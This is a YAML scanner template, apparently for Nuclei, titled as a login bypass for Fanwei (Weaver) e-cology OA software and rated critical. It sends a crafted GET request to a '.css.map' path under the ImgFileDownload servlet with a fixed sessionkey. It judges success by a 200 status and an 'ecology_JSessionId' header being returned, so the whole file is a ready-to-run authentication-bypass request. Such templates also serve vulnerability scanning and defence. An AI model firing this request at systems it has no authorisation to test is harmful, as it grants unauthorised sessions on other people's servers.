id: fanwei-byPass-login

info:
  name: 泛微绕过登录
  author: Str1am
  severity: critical
  tags: fanwei,bypass

requests:
  - raw:
      - |
        GET /weaver/weaver.file.ImgFileDownload/.css.map?sessionkey=7e687687-e79e-469f-b003-9e8af419c173 HTTP/1.1
        Host: {{Hostname}}
        Pragma: no-cache
        Cache-Control: no-cache
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,en-US;q=0.7,en;q=0.6
        Connection: close


    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "ecology_JSessionId"
        part: header
        condition: and